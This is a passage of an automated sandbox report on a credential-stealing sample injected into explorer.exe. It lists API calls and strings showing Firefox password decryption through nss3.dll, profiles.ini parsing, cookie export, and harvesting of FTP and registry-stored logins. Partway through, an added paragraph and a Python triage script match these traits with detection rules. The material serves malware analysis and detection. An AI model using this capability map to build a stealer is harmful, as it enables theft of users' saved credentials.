  • Part of subcall function 000C11E1: lstrlenW.KERNEL32(?,7570D5B5,00000000,?,00000000,?,000C46E3), ref: 000C11ED
  • Part of subcall function 000C11E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 000C120F
  • Part of subcall function 000C11E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 000C1231
• lstrcmpiW.KERNEL32(Server,?), ref: 000C45BE
• lstrcmpiW.KERNEL32(LastServer,?), ref: 000C45CD
• lstrcmpiW.KERNEL32(Host,?), ref: 000C4657
• lstrcmpiW.KERNEL32(Port,?), ref: 000C4679
• lstrcmpiW.KERNEL32(User,?), ref: 000C469F
• lstrcmpiW.KERNEL32(Pass,?), ref: 000C46C5
• wsprintfW.USER32 ref: 000C471E
Strings
Memory Dump Source
• Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
Similarity
• API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
• String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
• API String ID: 2230072276-1234691226
• Opcode ID: 30888a708acc5a0ea93051fd38392112b84266cdb92fea4b5db642ddf6ce8d0b
• Instruction ID: e843122c189cc5930bf12067dc9b5f1d3e7ad64f530fa00f5a5b4f521c672ced
• Opcode Fuzzy Hash: 30888a708acc5a0ea93051fd38392112b84266cdb92fea4b5db642ddf6ce8d0b
• Instruction Fuzzy Hash: 1BB1F571208302AFD744DF64C894F6AB7E9BF89745F00896CF5858B261DB72E846CB62
APIs
  • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
  • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
  • Part of subcall function 000C1090: lstrlenW.KERNEL32(?,?,00000000,000C17E5), ref: 000C1097
  • Part of subcall function 000C1090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 000C10A8
  • Part of subcall function 000C19B4: lstrlenW.KERNEL32(00000000,00000000,00000000,000C2CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 000C19C4
• GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 000C2503
• SetCurrentDirectoryW.KERNEL32(00000000), ref: 000C250A
• LoadLibraryW.KERNEL32(00000000), ref: 000C2563
• SetCurrentDirectoryW.KERNEL32(?), ref: 000C2570
• GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 000C2591
• GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 000C259E
• GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 000C25AB
• GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 000C25B8
• GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 000C25C5
• GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 000C25D2
• GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 000C25DF
  • Part of subcall function 000C190B: lstrlen.KERNEL32(?,?,?,?,00000000,000C2783), ref: 000C192B
  • Part of subcall function 000C190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,000C2783), ref: 000C1930
  • Part of subcall function 000C190B: lstrcat.KERNEL32(00000000,?), ref: 000C1946
  • Part of subcall function 000C190B: lstrcat.KERNEL32(00000000,00000000), ref: 000C194A
Strings
Memory Dump Source
• Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
Similarity
• API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
• String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
• API String ID: 3366569387-3272982511
• Opcode ID: c1b70d19bbb5fc11e2944ac74cd44553f1d1393c64af99f6848bdd0e200f2215
• Instruction ID: f27eb7f9fdc0b117fc65d383f015153ce6af75afbe9925de09a55da9ba8c9da4
• Opcode Fuzzy Hash: c1b70d19bbb5fc11e2944ac74cd44553f1d1393c64af99f6848bdd0e200f2215
• Instruction Fuzzy Hash: A3414835A00315ABCB28EF349D54FEE7AE59B96740B10003EF851D3AA3DB758C878B61
APIs
  • Part of subcall function 000C5BF5: memset.NTDLL ref: 000C5C07
                                                      • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 000C60E1
                                                      • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 000C60EC
                                                      • _alldiv.NTDLL(?,?,000003E8,00000000), ref: 000C6113
                                                      • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 000C618E
                                                      • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 000C61B5
                                                      • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 000C61C1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: _alldiv$_allrem$memset
                                                      • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                                                      • API String ID: 2557048445-1989508764
                                                      • Opcode ID: 07b6f24c9f0eccf547c5febb05cd4f55052b92d10405f92d4ab388aa2304a2eb
                                                      • Instruction ID: 502cfbf67b18a962bf2db5a4d44a48d6e4ebfb69120bd35f6eeed1c98243c828
                                                      • Opcode Fuzzy Hash: 07b6f24c9f0eccf547c5febb05cd4f55052b92d10405f92d4ab388aa2304a2eb
                                                      • Instruction Fuzzy Hash: 8CB182B1908B42ABD7399F24CC85F7F7FD4EB80344F24066DF482A62D2E722DD918691
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: memcmp
                                                      • String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                      • API String ID: 1475443563-3683840195
                                                      • Opcode ID: 6c12060513ba6a234d0862b8537c34ffa40511fdd26cf7abd0e86ff22dfed634
                                                      • Instruction ID: fe290169e0ce38446e0540a888359f41ab26a7e6bb3f0bce88348ddb2ddbfa1c
                                                      • Opcode Fuzzy Hash: 6c12060513ba6a234d0862b8537c34ffa40511fdd26cf7abd0e86ff22dfed634
                                                      • Instruction Fuzzy Hash: 5E51DF31508700ABC7649F64CC91AABB7E6EB45300F14487FF9969B382E771ED45CBA2
                                                      APIs
                                                      • DeleteFileW.KERNEL32(00000000,00000000,?), ref: 000C2AD2
                                                        • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                        • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 000C29E1
                                                      • lstrlen.KERNEL32(00000000), ref: 000C29EC
                                                      • wsprintfA.USER32 ref: 000C2A38
                                                      • lstrlen.KERNEL32(00000000), ref: 000C2A44
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 000C2A6C
                                                      • lstrlen.KERNEL32(00000000,?,?), ref: 000C2A99
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
                                                      • String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
                                                      • API String ID: 304071051-2605711689
                                                      • Opcode ID: b6fbec5da11f4ddb5932563bba272f676d001bde523c1f2972690ab1abefcc36
                                                      • Instruction ID: 6590630dc8a207623c16ac02fe2defee39dcf0182e8ea07b300ef6e5e98ee674
                                                      • Opcode Fuzzy Hash: b6fbec5da11f4ddb5932563bba272f676d001bde523c1f2972690ab1abefcc36
                                                      • Instruction Fuzzy Hash: 3F519E306083469BC729EF209851FBE77EAAF8A704F04482DF8859B653DB36DC458752
                                                      APIs
                                                        • Part of subcall function 000C1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C2F0C), ref: 000C1973
                                                        • Part of subcall function 000C1953: lstrlenW.KERNEL32(00116564,?,?,000C2F0C), ref: 000C1978
                                                        • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,?), ref: 000C1990
                                                        • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,00116564), ref: 000C1994
                                                        • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                        • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                        • Part of subcall function 000C1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C1B82
                                                        • Part of subcall function 000C1B6A: CloseHandle.KERNEL32(00000000), ref: 000C1B8F
                                                      • GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 000C2D13
                                                      • StrStrIW.SHLWAPI(00000000,Profile), ref: 000C2D45
                                                      • GetPrivateProfileStringW.KERNEL32(00000000,Path,0011637C,?,00000FFF,?), ref: 000C2D68
                                                      • GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 000C2D7B
                                                      • lstrlenW.KERNEL32(00000000), ref: 000C2DD8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
                                                      • String ID: IsRelative$Path$Profile$profiles.ini
                                                      • API String ID: 2234428054-4107377610
                                                      • Opcode ID: 9b31e7aee2010a9455d7b08a3ff5ee60b31241b697d1d82932e988be6aab703d
                                                      • Instruction ID: f4fb6b58b6dc00fad621c98ce7d2a5ce087e367b1053133f06ae5d2d601b58fc
                                                      • Opcode Fuzzy Hash: 9b31e7aee2010a9455d7b08a3ff5ee60b31241b697d1d82932e988be6aab703d
                                                      • Instruction Fuzzy Hash: E53170307043029BC664AF709951FAF76E2AFDA700F10843DF946A7693DBB68C869752
                                                      APIs
                                                        • Part of subcall function 000C19E5: RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A1E
                                                        • Part of subcall function 000C19E5: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A3C
                                                        • Part of subcall function 000C19E5: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A75
                                                        • Part of subcall function 000C19E5: RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A98
                                                        • Part of subcall function 000C482C: lstrlenW.KERNEL32(?), ref: 000C4845
                                                        • Part of subcall function 000C482C: lstrlenW.KERNEL32(?), ref: 000C488F
                                                        • Part of subcall function 000C482C: lstrlenW.KERNEL32(?), ref: 000C4897
                                                      • wsprintfW.USER32 ref: 000C49A7
                                                      • wsprintfW.USER32 ref: 000C49B9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$QueryValuewsprintf$CloseOpen
                                                      • String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
                                                      • API String ID: 2889301010-4273187114
                                                      • Opcode ID: 6d942c896039cf61200882cebd8a9d771eebd6e5605c6dbd17e4a4d5f43adce3
                                                      • Instruction ID: a8b09345e69ff1ba66a2465c1b4e31cc8dab7fd639ae0f15a18bb21264fc0e70
                                                      • Opcode Fuzzy Hash: 6d942c896039cf61200882cebd8a9d771eebd6e5605c6dbd17e4a4d5f43adce3
                                                      • Instruction Fuzzy Hash: 5B310130B043246BC714EB65CC65FAFB6EDEFCA784B05491DB00083282DBB2CC4283A2
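The four function listings above, read together, describe a credential-theft capability set inside the code injected into explorer.exe: nss3.dll exports resolved by name (NSS_Init, PK11SDR_Decrypt, PK11_GetInternalKeySlot), profiles.ini parsing via the Path and IsRelative keys, a TRUE/FALSE cookie line built with wsprintfA, and HostName/UserName/Password values read from the registry. The following Python script is an added example, not part of the Joe Sandbox report: it parses listings in this report's "APIs / Strings" format and flags those capability combinations per function. SAMPLE is constructed from lines that appear on this page; the rule names and the product hints in the comments are this example's assumptions, not statements the report makes.

```python
"""Capability triage over Joe Sandbox "APIs / Strings" function listings.

Added example (not the report's own code): parses the bullet listing format
used on this page, one record per function closed by its "Instruction Fuzzy
Hash" line, collects each function's APIs and literal strings/arguments, and
matches them against a few credential-theft rules. SAMPLE is built from lines
on this page; rule names and product hints are this example's assumptions.
"""
import re
from dataclasses import dataclass, field

BULLET = "\u2022"
# matches "Part of subcall function 000C1090: WideCharToMultiByte.KERNEL32(args)"
API_RE = re.compile(r"(?:Part of subcall function [0-9A-Fa-f]+: )?"
                    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?")
HEX_ARG_RE = re.compile(r"^-?[0-9A-Fa-f]{8}$")  # 00000000, -00000201, 000C2CAF ...

RULES = {  # rule -> (APIs, strings); all of both must occur in one function
    "firefox_nss_decrypt":    ({"LoadLibraryW", "GetProcAddress"},
                               {"nss3.dll", "NSS_Init", "PK11SDR_Decrypt"}),
    "firefox_profile_lookup": ({"GetPrivateProfileStringW"},
                               {"profiles.ini", "Path", "IsRelative"}),
    # value names of the kind an SCP/SFTP client keeps under HKCU (assumption)
    "registry_session_creds": ({"RegOpenKeyExW", "RegQueryValueExW"},
                               {"HostName", "UserName", "Password"}),
    # cookies.txt-style export: TRUE/FALSE columns formatted with wsprintfA
    "cookie_export":          ({"wsprintfA"}, {"COOKIES", "TRUE", "FALSE"}),
}

@dataclass
class FunctionRecord:
    opcode_id: str = ""
    apis: set = field(default_factory=set)
    strings: set = field(default_factory=set)

def _literal_args(args):
    """Yield argument tokens that are names (NSS_Init, Path), not hex or '?'."""
    for tok in (t.strip() for t in args.split(",")):
        if tok and tok != "?" and not HEX_ARG_RE.match(tok):
            yield tok

def parse_listing(text):
    """Split a listing into FunctionRecord objects, one per disassembled function."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip().lstrip(BULLET).strip()
        if line.startswith("String ID:"):  # Joe Sandbox joins strings with '$'
            cur.strings.update(s.strip() for s in line[10:].split("$") if s.strip())
        elif line.startswith("Opcode ID:"):
            cur.opcode_id = line[10:].strip()
        elif line.startswith("Instruction Fuzzy Hash:"):  # last line of a record
            records.append(cur)
            cur = FunctionRecord()
        elif " ref: " in line:  # an API call line, possibly from a subcall
            m = API_RE.match(line)
            if m:
                cur.apis.add(m["api"])
                cur.strings.update(_literal_args(m["args"] or ""))
    return records

def match_rules(rec):
    """Names of rules whose API set and string set are both present in rec."""
    return sorted(name for name, (apis, strs) in RULES.items()
                  if apis <= rec.apis and strs <= rec.strings)

def triage(text):
    """Map each matched rule to the Opcode IDs of the functions that triggered it."""
    hits = {}
    for rec in parse_listing(text):
        for name in match_rules(rec):
            hits.setdefault(name, []).append(rec.opcode_id)
    return hits

# Constructed sample: five records taken from the listings on this page.
SAMPLE = """\
• LoadLibraryW.KERNEL32(00000000), ref: 000C2563
• GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 000C25D2
• String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
• Opcode ID: c1b70d19bbb5fc11e2944ac74cd44553f1d1393c64af99f6848bdd0e200f2215
• Instruction Fuzzy Hash: A3414835A00315ABCB28EF349D54FEE7AE59B96740B10003EF851D3AA3DB758C878B61
• GetPrivateProfileStringW.KERNEL32(00000000,Path,0011637C,?,00000FFF,?), ref: 000C2D68
• String ID: IsRelative$Path$Profile$profiles.ini
• Opcode ID: 9b31e7aee2010a9455d7b08a3ff5ee60b31241b697d1d82932e988be6aab703d
• Instruction Fuzzy Hash: E53170307043029BC664AF709951FAF76E2AFDA700F10843DF946A7693DBB68C869752
• Part of subcall function 000C19E5: RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A1E
• Part of subcall function 000C19E5: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A3C
• String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
• Opcode ID: 6d942c896039cf61200882cebd8a9d771eebd6e5605c6dbd17e4a4d5f43adce3
• Instruction Fuzzy Hash: 5B310130B043246BC714EB65CC65FAFB6EDEFCA784B05491DB00083282DBB2CC4283A2
• wsprintfA.USER32 ref: 000C2A38
• String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
• Opcode ID: b6fbec5da11f4ddb5932563bba272f676d001bde523c1f2972690ab1abefcc36
• Instruction Fuzzy Hash: 3F519E306083469BC729EF209851FBE77EAAF8A704F04482DF8859B653DB36DC458752
• String ID: -journal$-wal$immutable$nolock
• Opcode ID: 3a6a27faacbf6c92f88da7b8fe7d6f9162755b9b1709fa4f42044f80face6d1e
• Instruction Fuzzy Hash: EFD1C2B16083429FDB54DF28C881B6EBBE2AF95310F08457DF8998B392DB75D805CB52
"""

if __name__ == "__main__":
    for name, ids in triage(SAMPLE).items():
        print(f"{name}: {', '.join(i[:16] for i in ids)}")
```

Each rule requires its APIs and its strings to occur in the same function record, so a generic lstrlen/lstrcat helper or the SQLite journal strings in the last record do not match anything on their own; the sqlite record is included precisely to show that a string-only hit is not enough. The Opcode ID returned for each hit is the stable per-function identifier the report already uses, which makes it a convenient key when comparing this sample's injected module against other explorer.exe dumps.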
                                                      APIs
                                                      • memcpy.NTDLL(?,?,?,?,00000000), ref: 000CFB32
                                                      • memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 000CFB4D
                                                      • memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 000CFB60
                                                      • memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 000CFB95
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: memcpy
                                                      • String ID: -journal$-wal$immutable$nolock
                                                      • API String ID: 3510742995-3408036318
                                                      • Opcode ID: 3a6a27faacbf6c92f88da7b8fe7d6f9162755b9b1709fa4f42044f80face6d1e
                                                      • Instruction ID: c89defe6d0ec5f2e348624996de8f07d2a3918ed32f10c12a661b1774d24ac5e
                                                      • Opcode Fuzzy Hash: 3a6a27faacbf6c92f88da7b8fe7d6f9162755b9b1709fa4f42044f80face6d1e
                                                      • Instruction Fuzzy Hash: EFD1C2B16083429FDB54DF28C881B6EBBE2AF95310F08457DF8998B392DB75D805CB52
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %$-x0$NaN
                                                      • API String ID: 0-62881354
                                                      • Opcode ID: 1f87efaaba1fee79add35bd9cc08fce12440bd0c0f297eea647123ba31e58b4e
                                                      • Instruction ID: 2846519d4a6e4ce3f269d2e408c114d7b22045f5ff8cdb487a6a7542025fffbd
                                                      • Opcode Fuzzy Hash: 1f87efaaba1fee79add35bd9cc08fce12440bd0c0f297eea647123ba31e58b4e
                                                      • Instruction Fuzzy Hash: A1D1E27060C3828BD7758F288490F6EBBE1AFD9304F28486DF8C997352D665C985DF82
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -x0$NaN
                                                      • API String ID: 0-3447725786
                                                      • Opcode ID: f1684721801c51636d9e7cfdca5a507d959a7a8fa1aee60da40d0f8f337b0ba3
                                                      • Instruction ID: 740b431186cbd86f8beda1b7881111a455780db19083a412a37fa82ce740fb92
                                                      • Opcode Fuzzy Hash: f1684721801c51636d9e7cfdca5a507d959a7a8fa1aee60da40d0f8f337b0ba3
                                                      • Instruction Fuzzy Hash: 38E1F13060C3828BD7758B288490F6EBBE1AFD5304F28496DF8CA97392D665CD85DF42
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -x0$NaN
                                                      • API String ID: 0-3447725786
                                                      • Opcode ID: d11ac3931c9dcbdf64c11220ffdcdad05de039478f86599600d604ead2a3fca6
                                                      • Instruction ID: 49cfba68ecb272604455ab1bf93e6065161ddbaac16dd1229a547ce8d9fa3cb2
                                                      • Opcode Fuzzy Hash: d11ac3931c9dcbdf64c11220ffdcdad05de039478f86599600d604ead2a3fca6
                                                      • Instruction Fuzzy Hash: F2E1D07060C3828BD7758F288490F6EBBE1AFD9304F28486DF8C997352D665CD85DB92
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -x0$NaN
                                                      • API String ID: 0-3447725786
                                                      • Opcode ID: 5ae9f130e295ecc918f38888d72d74336ee56103749728bc1bf10e18509c401b
                                                      • Instruction ID: 330c28c3a8c259f09a395ee402843b1e1ee634393dab25b9175627596b395c55
                                                      • Opcode Fuzzy Hash: 5ae9f130e295ecc918f38888d72d74336ee56103749728bc1bf10e18509c401b
                                                      • Instruction Fuzzy Hash: 41E1D17060C3828BD7758F288490F6EBBE1AFD9304F28496DF8C997252D665CD85DF82
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -x0$NaN
                                                      • API String ID: 0-3447725786
                                                      • Opcode ID: 12c5b43fe113939aaceb655c91f85d05b91aaa74e882c37652a697ff0788fd34
                                                      • Instruction ID: 3e2e44be8ce5833cedf5209992f3b6124b63f10efd9ff1d5558781f21c33e25c
                                                      • Opcode Fuzzy Hash: 12c5b43fe113939aaceb655c91f85d05b91aaa74e882c37652a697ff0788fd34
                                                      • Instruction Fuzzy Hash: 01E1C07060C3828BD7758F288490B6EBBE1AFD9304F28486EF8C997352D665C985DF52
                                                      APIs
                                                      • _aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 000C720E
                                                      • _aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 000C7226
                                                      • _aulldvrm.NTDLL(00000000,00000000,?), ref: 000C727B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: _aulldvrm$_aullrem
                                                      • String ID: -x0$NaN
                                                      • API String ID: 105165338-3447725786
                                                      • Opcode ID: 697a355066af11d687313151855d968ba20047efb11636d4341a035609d3aa1b
                                                      • Instruction ID: 095dbadfaab6f1bee5de8b21bd2d2e33f27f2685042f1941eef9401a89e760a0
                                                      • Opcode Fuzzy Hash: 697a355066af11d687313151855d968ba20047efb11636d4341a035609d3aa1b
                                                      • Instruction Fuzzy Hash: EED1D17060C3828BD7758F288490F6EBBE1AFD9304F28486DF8C997352D665C985DF42
                                                      APIs
                                                      • _allmul.NTDLL(00000000,?,0000000A,00000000), ref: 000C8AAD
                                                      • _allmul.NTDLL(?,?,0000000A,00000000), ref: 000C8B66
                                                      • _allmul.NTDLL(?,00000000,0000000A,00000000), ref: 000C8C9B
                                                      • _alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 000C8CAE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: _allmul$_alldvrm
                                                      • String ID: .
                                                      • API String ID: 115548886-248832578
                                                      • Opcode ID: f11f46264f1b6b686032050282387c4c62a0e9e1c11a8a3e6ee38c67af6638e3
                                                      • Instruction ID: c3149298e95e9918c44611cf8e246113e996e8021401bd2d5001290e625d50f0
                                                      • Opcode Fuzzy Hash: f11f46264f1b6b686032050282387c4c62a0e9e1c11a8a3e6ee38c67af6638e3
                                                      • Instruction Fuzzy Hash: 62D106B190C7858BC724DF088884B7EBBF0FBD5315F04896EF6C696291DBB1C945878A
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: memset
                                                      • String ID: ,$7$9
                                                      • API String ID: 2221118986-1653249994
                                                      • Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                      • Instruction ID: a93434c1d82605a0d62f71d02381052b5582f2d7eb856f10f18e2b53618c85e9
                                                      • Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                      • Instruction Fuzzy Hash: 2B316A715083849FD374DF60D840B8FBBE9AB85340F00892EF98997252EB719549CBA2
                                                      APIs
                                                      • lstrlenW.KERNEL32(00000000,00000000,?,000C2E75,PathToExe,00000000,00000000), ref: 000C1BCC
                                                      • StrStrIW.SHLWAPI(00000000,.exe), ref: 000C1BF0
                                                      • StrRChrIW.SHLWAPI(00000000,00000000,0000005C), ref: 000C1C05
                                                      • lstrlenW.KERNEL32(00000000,?,000C2E75,PathToExe,00000000,00000000), ref: 000C1C1C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: lstrlen
                                                      • String ID: .exe
                                                      • API String ID: 1659193697-4119554291
                                                      • Opcode ID: adc4d391923bc5eb2d88b03df1ecb30fe94817b9363fbb4fc9487718162ebe22
                                                      • Instruction ID: 50335f77f410bd166654ed93a2edc7e36a47193c3495a10abe623a915ced33e0
                                                      • Opcode Fuzzy Hash: adc4d391923bc5eb2d88b03df1ecb30fe94817b9363fbb4fc9487718162ebe22
                                                      • Instruction Fuzzy Hash: 77F0AF30351220AAD3686B34AD85FFE62E5EF06341720882EF042C21A2EB618C818759
                                                      APIs
                                                      • _allmul.NTDLL(?,00000000,00000018), ref: 000D316F
                                                      • _allmul.NTDLL(-00000001,00000000,?,?), ref: 000D31D2
